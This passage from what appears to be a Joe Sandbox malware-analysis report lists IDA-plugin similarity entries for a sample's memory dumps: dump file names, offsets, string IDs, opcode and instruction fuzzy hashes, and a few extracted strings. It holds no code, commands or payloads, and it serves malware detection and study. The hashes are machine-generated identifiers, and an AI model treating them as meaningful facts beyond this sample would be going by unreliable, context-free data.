                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: H{D}$TgXy$_o]a$=>?
                                                                                • API String ID: 0-2004217480
                                                                                • Opcode ID: 7ea5e02b6d3d0b529aeeaa89ad18d809642681e0d58540d03cb5831137178caf
                                                                                • Instruction ID: 0e9e5d1718cd1891983fe139871622c45fb05c0715b8615840aa5a955969aaa9
                                                                                • Opcode Fuzzy Hash: 7ea5e02b6d3d0b529aeeaa89ad18d809642681e0d58540d03cb5831137178caf
                                                                                • Instruction Fuzzy Hash: D11247B1210B01CFD3258F25D895B97BBF5FB89314F048A2DD5AA8BBA0DB74A445CF90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: =:;8$=:;8$a{$kp
                                                                                • API String ID: 0-2717198472
                                                                                • Opcode ID: e1d1188f20ba8b4956459dd02fa8e61b112d0829e2db9271f8bc9ff5b3fb9b11
                                                                                • Instruction ID: 2ec2d6aa74249ddf0fa9f84f8db20e339e1435e23c7e7493e3d8a89c2b869f89
                                                                                • Opcode Fuzzy Hash: e1d1188f20ba8b4956459dd02fa8e61b112d0829e2db9271f8bc9ff5b3fb9b11
                                                                                • Instruction Fuzzy Hash: 66E1EFB5518345CFE724CF24D8817ABBBF5FBC9304F08892CE6898B291DB749855CB82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @A$lPLN$svfZ$IK
                                                                                • API String ID: 0-1806543684
                                                                                • Opcode ID: 59ab3f99b1a2354029e1aafa6b12d4297b5e3e02290d7d81872a99a3867a79f3
                                                                                • Instruction ID: 2635b00ef6e7a019937bd38a2cd8e66e05cce25b7a6570f8c5ef7d890da8876a
                                                                                • Opcode Fuzzy Hash: 59ab3f99b1a2354029e1aafa6b12d4297b5e3e02290d7d81872a99a3867a79f3
                                                                                • Instruction Fuzzy Hash: DDC1267165C3858FD3258E2484A136FBBE2EBC2700F19C92DE4E94B381D775CC099B82
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: sW__$wU$}?)
                                                                                • API String ID: 0-1890733208
                                                                                • Opcode ID: 391bfcca36cb5c47d28432325d6d2925deb7210992b4b6914ec493c5eb9777cf
                                                                                • Instruction ID: d3a86e2be1c65db588660e2d1349e11080db58ff1a53f5ef66907670d1de1e81
                                                                                • Opcode Fuzzy Hash: 391bfcca36cb5c47d28432325d6d2925deb7210992b4b6914ec493c5eb9777cf
                                                                                • Instruction Fuzzy Hash: 58B206F360C204AFE3086E2DEC8567ABBE9EB94320F1A453DE6C5C7744EA3558058697
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @J$KP$VD$ra/
                                                                                • API String ID: 0-1889624851
                                                                                • Opcode ID: 5afbd24530cdee5813e0e19278a8bc55e6c32386d398642ede985e02cb335370
                                                                                • Instruction ID: f96b11e3a7d1cb083bcd1ab1c6217e3097acd1af30118912392de23fd80236d8
                                                                                • Opcode Fuzzy Hash: 5afbd24530cdee5813e0e19278a8bc55e6c32386d398642ede985e02cb335370
                                                                                • Instruction Fuzzy Hash: 8F915471704B05AFD720CF64DC81BABBBB5FB86310F14862CE5959B781D374A826CB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: =*_{$AQmz
                                                                                • API String ID: 0-4289549882
                                                                                • Opcode ID: 1209b4b175d5e5683c305187d6d45b20b14fedb993b28f716fccfc1cca6a1a43
                                                                                • Instruction ID: 44d608c66f7b6bb4ccaed25792b7b4514c168e2eb80c9aabf7ef33716b1d7c81
                                                                                • Opcode Fuzzy Hash: 1209b4b175d5e5683c305187d6d45b20b14fedb993b28f716fccfc1cca6a1a43
                                                                                • Instruction Fuzzy Hash: 67B2E6F360C2049FE7046E69EC85B7ABBE9EF94320F16493DEAC5C7340EA3558058697
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6[Y$=
                                                                                • API String ID: 0-939132570
                                                                                • Opcode ID: 7191b7c54c2ec7b3b5b3fd6c21401a9dabb1cb3a84be05e856b2651080ef10d7
                                                                                • Instruction ID: 6b888ec65c4df3c8f6b8c368ae99a636cddd1723f04adcaa836bb0933ae0de87
                                                                                • Opcode Fuzzy Hash: 7191b7c54c2ec7b3b5b3fd6c21401a9dabb1cb3a84be05e856b2651080ef10d7
                                                                                • Instruction Fuzzy Hash: 60B2F3F350C2009FE308AE2DEC8567ABBE9EF94320F1A492DE6C5C7744EA3558458797
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PQ$A_$IG
                                                                                • API String ID: 0-2179527320
                                                                                • Opcode ID: b50a26a88753a8fa67083984bb1ce87bf40d743a47b8bbc3a8c144d40eec901c
                                                                                • Instruction ID: 1130ab7bb1ab03b71f5ea0fd6eeadd99bb13821e73d7b867aa93f97084cbd0d7
                                                                                • Opcode Fuzzy Hash: b50a26a88753a8fa67083984bb1ce87bf40d743a47b8bbc3a8c144d40eec901c
                                                                                • Instruction Fuzzy Hash: C941BAB401C352CAC704CF21D89266BBBF0FF96758F249A0EE0C59B695E7348946CB5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID: f$
                                                                                • API String ID: 2994545307-508322865
                                                                                • Opcode ID: 085a4035c8ab1bdaf810055f5c2e661e27a1c568c0cd4172ca1a91559db5bdae
                                                                                • Instruction ID: 8789d8e7112e5a788aa21f70b6367d50818c2cff8f2634c551fe9b15f187cf18
                                                                                • Opcode Fuzzy Hash: 085a4035c8ab1bdaf810055f5c2e661e27a1c568c0cd4172ca1a91559db5bdae
                                                                                • Instruction Fuzzy Hash: 491203702193418FD716CF29C8A0A6BBBE5BBC9314F299B6CE595872E2C331DC41CB52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $:?
                                                                                • API String ID: 0-1635603247
                                                                                • Opcode ID: 492af472322f692035d73275741ad39c6b1b73049116940b7458d0b9761e27c0
                                                                                • Instruction ID: 5cefce8a23f4ac139a12c03df6bbd40de6b20517db577520c25d0a60bf568975
                                                                                • Opcode Fuzzy Hash: 492af472322f692035d73275741ad39c6b1b73049116940b7458d0b9761e27c0
                                                                                • Instruction Fuzzy Hash: AFB2F5F360C200AFE7046E2DEC8567ABBE9EF94720F16493DEAC5C3744EA3558058796
                                                                                Strings
                                                                                • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00302591
                                                                                • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 003025D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                • API String ID: 0-2492670020
                                                                                • Opcode ID: e6dd7f424a4a740130ebb4995f9409df6d6e343df95fe8fd7c6af6449abd604c
                                                                                • Instruction ID: 9dab8cfec195c84b215ec48eac08bff705885ba10a39700210f70cf0470581a4
                                                                                • Opcode Fuzzy Hash: e6dd7f424a4a740130ebb4995f9409df6d6e343df95fe8fd7c6af6449abd604c
                                                                                • Instruction Fuzzy Hash: 41815B33A0A6914BCB1A8E3C8C753EBBB965F9B330F2DC3A9D8719B3D5C12588058351
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: efg`$efg`
                                                                                • API String ID: 0-3010568471
                                                                                • Opcode ID: 3a7bd2464b2e311ce6c5c2a3604627cc2ee05c6e853fa95273322450e096e933
                                                                                • Instruction ID: f5052baf00b1d9579c3123675be4fd6d84c5f4241fb01c8cacda0280ecc68486
                                                                                • Opcode Fuzzy Hash: 3a7bd2464b2e311ce6c5c2a3604627cc2ee05c6e853fa95273322450e096e933
                                                                                • Instruction Fuzzy Hash: A431E632A283518BC728EF50D5A169FB3A2BFE4300F5A442ED9C667755CE709D06C7D2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000329000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000004B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.0000000000596000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521337868.00000000005D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521723487.00000000005D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522234851.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1522260423.0000000000773000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2d0000_file.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: st@
                                                                                • API String ID: 0-3741395493
                                                                                • Opcode ID: 99e6560759627f8f2afa9ecda9adef1c8f5fea80efeee50c913c24e1f3247e67
                                                                                • Instruction ID: 6142b9e811aa43a2b614f34ee133c79aed571513ea72dd12b2e053a496065dc0
                                                                                • Opcode Fuzzy Hash: 99e6560759627f8f2afa9ecda9adef1c8f5fea80efeee50c913c24e1f3247e67
                                                                                • Instruction Fuzzy Hash: 5EF123B151C3828FD3048F24885136BFBE6AF9A344F18887DE5C58B382D775D959CB92
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1521207615.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                                                                • Associated: 00000005.00000002.1521183556.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521207615.0000000000315000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000005.00000002.1521278975.0000000000327000.00000004.00000001.01000000.00000003.sdmpDownload File
